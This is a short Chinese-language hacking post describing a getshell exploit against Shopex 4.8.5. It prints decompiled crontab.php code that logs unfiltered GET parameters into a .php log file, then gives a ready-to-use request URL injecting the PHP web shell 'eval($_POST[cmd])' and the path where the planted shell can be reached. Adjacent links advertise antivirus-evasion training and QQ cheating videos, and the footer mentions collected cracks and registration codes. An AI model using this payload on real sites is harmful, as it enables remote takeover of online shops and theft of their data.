Shopex 4.8.5 getshell利用

  by   老鬼  


本机搭好了

出来好久了，测试大家看下。漏洞文件


漏洞代码： 
core\include_v5\crontab.php zend加密后的，我只发布解密后的代码。

public function run( )
{
$this->logFile = HOME_DIR."/logs/access.log.php";  生成的文件
$this->now = time( );
$this->viewStat( );
$messenger =& $this->loadModel( "system/messenger" );
$messenger->runQueue( );
} 
public function viewStat( )
{
if ( !file_exists( $this->logFile ) )
{
file_put_contents( $this->logFile, "#<?php exit()?> " ); //囧之处 
}
if ( isset( $_GET[action] ) )
{
error_log( $this->now." ".$_GET[action]." ".$_GET[p]." ", 3, $this->logFile );//没有任何过滤，


漏洞利用：

不知道原理，只测试了几个站，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。


直接提交：http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>


一句话在：http://127.0.0.1/shopex/home/logs/access.log.php

直接连接。。结束

·上一动画：免杀教程—VIP免杀培训班第4课免杀的步骤.rar
·下一动画：刷QQ钻视频教程

   评论摘要(共 0 条，得分 0 分，平均 0 分) 查看完整评论

---

* 为了达到最快的下载速度，推荐使用网际快车或迅雷下载本站软件。
* 请一定升级到最新版WinRAR3.80才能正常解压本站提供的软件!
* 如果您发现下载链接错误，请点击报告错误谢谢！
* 站内提供的所有软件包含破解及注册码均是由网上搜集，若侵犯了你的版权利益，敬请来信通知我们!